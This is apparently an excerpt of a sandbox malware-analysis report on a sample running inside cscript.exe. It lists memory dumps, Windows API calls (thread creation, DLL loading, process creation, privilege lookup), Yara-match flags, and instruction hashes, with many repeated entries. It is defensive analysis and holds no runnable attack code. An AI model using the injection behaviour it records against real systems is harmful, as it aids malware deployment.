                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b3bbf9d1fa881a6a3afffcb34676ae7ef43c3e0bf98939beaa532388b0c48baa
                                                                            • Instruction ID: 36c139e8f04599b2290db9a3ca84d9f334c864c69a5f3a2a67d772044ea8e9b5
                                                                            • Opcode Fuzzy Hash: b3bbf9d1fa881a6a3afffcb34676ae7ef43c3e0bf98939beaa532388b0c48baa
                                                                            • Instruction Fuzzy Hash: 8090027124240013610571588414616400A8BE0245B55C021F6019591DC525D9A26526
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 59b7ebcde7592f6173849a3f2f5ec23569ae6a3ba6c89e3326fb48b98ce773b4
                                                                            • Instruction ID: ea1dbf856635b1f8b5117dc20f6ba868c617fb5ca9265797374626283802df13
                                                                            • Opcode Fuzzy Hash: 59b7ebcde7592f6173849a3f2f5ec23569ae6a3ba6c89e3326fb48b98ce773b4
                                                                            • Instruction Fuzzy Hash: 8190023164550412F1007158851470610058BD0245F65C411B5429569D8795DA6269A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 243 2db9080-2db90c2 call 2dbbd40 246 2db90c8-2db9118 call 2dbbe10 call 2daacf0 call 2db4e50 243->246 247 2db919c-2db91a2 243->247 254 2db9120-2db9131 Sleep 246->254 255 2db9133-2db9139 254->255 256 2db9196-2db919a 254->256 257 2db913b-2db9161 call 2db8ca0 255->257 258 2db9163-2db9184 call 2db8eb0 255->258 256->247 256->254 262 2db9189-2db918c 257->262 258->262 262->256
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 02DB9128
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 0fdc58a123b94ef49e460aea890e5665add696cba25f5809d50b3b88e2771d27
                                                                            • Instruction ID: 9ded5982942ffdb03d155b1472df9b3aaa9e7525b23d1726b61589fc392d2527
                                                                            • Opcode Fuzzy Hash: 0fdc58a123b94ef49e460aea890e5665add696cba25f5809d50b3b88e2771d27
                                                                            • Instruction Fuzzy Hash: 52318EB6500244EBC725DF64C895FABB7B9EF48B00F00811DEA2A9B245D630BA50CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 263 2db9076-2db90af 264 2db90bb-2db90c2 263->264 265 2db90b6 call 2dbbd40 263->265 266 2db90c8-2db9118 call 2dbbe10 call 2daacf0 call 2db4e50 264->266 267 2db919c-2db91a2 264->267 265->264 274 2db9120-2db9131 Sleep 266->274 275 2db9133-2db9139 274->275 276 2db9196-2db919a 274->276 277 2db913b-2db9161 call 2db8ca0 275->277 278 2db9163-2db9184 call 2db8eb0 275->278 276->267 276->274 282 2db9189-2db918c 277->282 278->282 282->276
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 02DB9128
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: fed8a1f8b7aeaab8dbde3f3a6b0c6300c56857273205f3f1c4ee83f43ad39af7
                                                                            • Instruction ID: 21936e9106443f380633c0862c6853733833be42bf802a75800d36cb2d720aa5
                                                                            • Opcode Fuzzy Hash: fed8a1f8b7aeaab8dbde3f3a6b0c6300c56857273205f3f1c4ee83f43ad39af7
                                                                            • Instruction Fuzzy Hash: 0521C1B1900340EBC715DF64C8A5BEBBBB9EF48B00F10811DEA2A5B345D770A950CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 289 2dba66a-2dba686 290 2dba68c-2dba6a1 RtlFreeHeap 289->290 291 2dba687 call 2dbaf60 289->291 291->290
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DA3AF8), ref: 02DBA69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
                                                                            • Instruction ID: fac533be76c802c91db2216ce16724aeecbbaa234e72d5c75240e65811192d15
                                                                            • Opcode Fuzzy Hash: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
                                                                            • Instruction Fuzzy Hash: 3FE01AB6200204AFD714DF58CC88EEB37AAEF88350F118555FA1D97291C631E910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 292 2dba670-2dba6a1 call 2dbaf60 RtlFreeHeap
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DA3AF8), ref: 02DBA69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction ID: 471cbc09f336be0d26d6ee835412e3d66aab56297a14588c572120ece64e111c
                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction Fuzzy Hash: 4CE01AB1200208ABD714DF59CC48EE777ADEF88750F118554B90957241C630E910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 295 2da8308-2da831f 296 2da8328-2da835a call 2dbca00 call 2daacf0 call 2db4e50 295->296 297 2da8323 call 2dbbe60 295->297 304 2da838e-2da8392 296->304 305 2da835c-2da836e PostThreadMessageW 296->305 297->296 306 2da838d 305->306 307 2da8370-2da838b call 2daa480 PostThreadMessageW 305->307 306->304 307->306
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DA836A
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DA838B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
                                                                            • Instruction ID: 2e7e002858a04766d216ca5a76705530e3c43b4abd7957246a2fc691b4b2f941
                                                                            • Opcode Fuzzy Hash: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
                                                                            • Instruction Fuzzy Hash: 8901B531A402287BE721A6949C52FEE776CAF00B51F040159FF04BA2C1E6D46D058BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DA836A
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DA838B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                            • Instruction ID: 70c8faab2acd137d4c5f2489d881ac16d729c23dc57eeb5219688199bb960174
                                                                            • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                            • Instruction Fuzzy Hash: 3E018431A802287AE721A6949C52FFE776D9F40B50F040159FF04FA2C1E6946D0586F5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 520 2db91fd-2db91fe 521 2db9200-2db9216 520->521 522 2db91b6-2db91d8 call 2db4e50 520->522 523 2db9218-2db9221 521->523 524 2db9233-2db923a 521->524 532 2db91da-2db91f6 call 2dbf252 CreateThread 522->532 533 2db91f7-2db91fc 522->533 523->524 526 2db9223-2db922a 523->526 527 2db931d-2db9320 524->527 528 2db9240-2db9309 call 2dbbde0 * 2 call 2dbc0b0 call 2dbbde0 call 2dbc0b0 call 2dbbde0 * 2 524->528 526->528 530 2db922c 526->530 528->527 549 2db930b-2db9314 528->549 530->524 549->527 550 2db9316 549->550 550->527
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DAF050,?,?,00000000), ref: 02DB91EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
                                                                            • Instruction ID: 6aad7481b81ff8342687e344633dfb44e044d8e4f4eef4963de2a597ea41f84d
                                                                            • Opcode Fuzzy Hash: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
                                                                            • Instruction Fuzzy Hash: 8D41AEB2600745AFD729DF64CC91FE7B3A9EF40744F444519E62AAB281CB74B910CBB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DAAD62
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction ID: 51aeec29c44d2284f85490f09c632653391e0642a27da255ec6d9871600700b9
                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction Fuzzy Hash: 1B011EB5D0020DABDF10DBA4DC51FDDB379AF54308F1046A5A90997240FA31EB14CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DBA734
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction ID: 79f3428859b1b5c624bd678e67021217198de6981086372e41ae981430ab5cc2
                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction Fuzzy Hash: D401AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DAF050,?,?,00000000), ref: 02DB91EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                            • Instruction ID: f17152c3fd7b0e8b6cecf878bfa3cfcc2f4cb1f5244adb21809cc7e18fb72861
                                                                            • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                            • Instruction Fuzzy Hash: C8E06D377802047AE3216599AC12FE7B29CCF81B64F150026FA0EEA6C1D995F80146A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DAF050,?,?,00000000), ref: 02DB91EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
                                                                            • Instruction ID: 069fd43daea5d584410046c9fa02803e97a38365acead993d824fabbcb25c72d
                                                                            • Opcode Fuzzy Hash: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
                                                                            • Instruction Fuzzy Hash: 98F0EC36B403007ED33195199C57FE77358DF90B10F140029F609EB2C1CAA0F84146A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DAF1D2,02DAF1D2,?,00000000,?,?), ref: 02DBA800
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
                                                                            • Instruction ID: 9bf1f1ea567ccb19d417ce6cfbc81fc7662822d8501c22877453e6ffa953169c
                                                                            • Opcode Fuzzy Hash: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
                                                                            • Instruction Fuzzy Hash: 31F0E5B5200255AFC710DF48CC84FD7B769DF88640F108194FD0D5B242C630A811CBF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(02DB4536,?,02DB4CAF,02DB4CAF,?,02DB4536,?,?,?,?,?,00000000,00000000,?), ref: 02DBA65D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction ID: 44e0e60be4955c8b037ca8ed37c3a7150188fe6342b0f1053f49a25e8393f29f
                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                            • Instruction Fuzzy Hash: 54E012B2200208ABDB14EF99CC44EEB77ADEF88654F118558BA095B281C630F910CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DAF1D2,02DAF1D2,?,00000000,?,?), ref: 02DBA800
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction ID: b25d4bc98939cac6d8b5cc6d3a0121a4140c56efec4efc62c1cc04f5a8833f99
                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction Fuzzy Hash: BEE01AB1200208ABDB10DF49CC84EEB37ADEF88650F118154BA0957241C930E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,02DA8D14,?), ref: 02DAF6FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                            • Instruction ID: dd317c94aa9351dd1450957dd82e702020a649795039a16515eb2d66d6563617
                                                                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                            • Instruction Fuzzy Hash: B7D05E656503082AE610EAA89C22F6632899B44B04F490064F949963C3D950F4008565
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ab22ffaaa5f445569cf3dbdb3cf61f1fe9945d33d753e9f9cc0fcdbee599bd8c
                                                                            • Instruction ID: a7755fddb5cd7ea94c474a5f946bf4232583223998856a24180be871d5698fe3
                                                                            • Opcode Fuzzy Hash: ab22ffaaa5f445569cf3dbdb3cf61f1fe9945d33d753e9f9cc0fcdbee599bd8c
                                                                            • Instruction Fuzzy Hash: DDB09B71D415C5D5FB11F76046087177D006BD0755F16C071F3034642E4778D1D2E576
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00706542,00001000,?,?), ref: 007064A8
                                                                            • HeapAlloc.KERNEL32(00000000,?,00706542,00001000,?,?), ref: 007064AF
                                                                            • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,00706542,00001000,?,?), ref: 0070E8CA
                                                                            • HeapFree.KERNEL32(00000000,?,00706542,00001000,?,?), ref: 0070E8D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 756756679-0
                                                                            • Opcode ID: c8d7d4b3f0a42667f756e7324291000282f5c94bae511a2da3492d515b34d7ad
                                                                            • Instruction ID: b4b0511906f3333d48856bd0ac90296747d529a39588a27ebebbace73fa8c027
                                                                            • Opcode Fuzzy Hash: c8d7d4b3f0a42667f756e7324291000282f5c94bae511a2da3492d515b34d7ad
                                                                            • Instruction Fuzzy Hash: 75F02231504341EBD7645FA8DC18B6676E8EB04731F20CA2DF209CB1D0EA7CC9A0C719
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 007184A1
                                                                            • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,00000000,?,00000000), ref: 007184D4
                                                                            • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,?,00000000), ref: 00718512
                                                                            • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 0071853C
                                                                            • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?,?,00000000), ref: 00718607
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                                            • String ID: %s\%s$MUI
                                                                            • API String ID: 1597595625-2651373239
                                                                            • Opcode ID: e5ec8735056449a7970f5f089635f0f50685ad1895da980a38ebca8e5afc97fa
                                                                            • Instruction ID: 656877266a1ee8b60cae3d93b3b6b242f463ad5035013a6d4dbb5f17d04f748d
                                                                            • Opcode Fuzzy Hash: e5ec8735056449a7970f5f089635f0f50685ad1895da980a38ebca8e5afc97fa
                                                                            • Instruction Fuzzy Hash: 98B19A71E0026D9BCF719F688C59BEA77799B84300F0485F5E909A72C1EE388EC58F56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 75fd0fcbb20c59d9dafe329ca3207525b24199f61ec4282fdb1e1a95863d93c9
                                                                            • Instruction ID: b407b419306fcc3babd4a84486dfc62b6b20f5c628ac814e79d88bdec79d1b7e
                                                                            • Opcode Fuzzy Hash: 75fd0fcbb20c59d9dafe329ca3207525b24199f61ec4282fdb1e1a95863d93c9
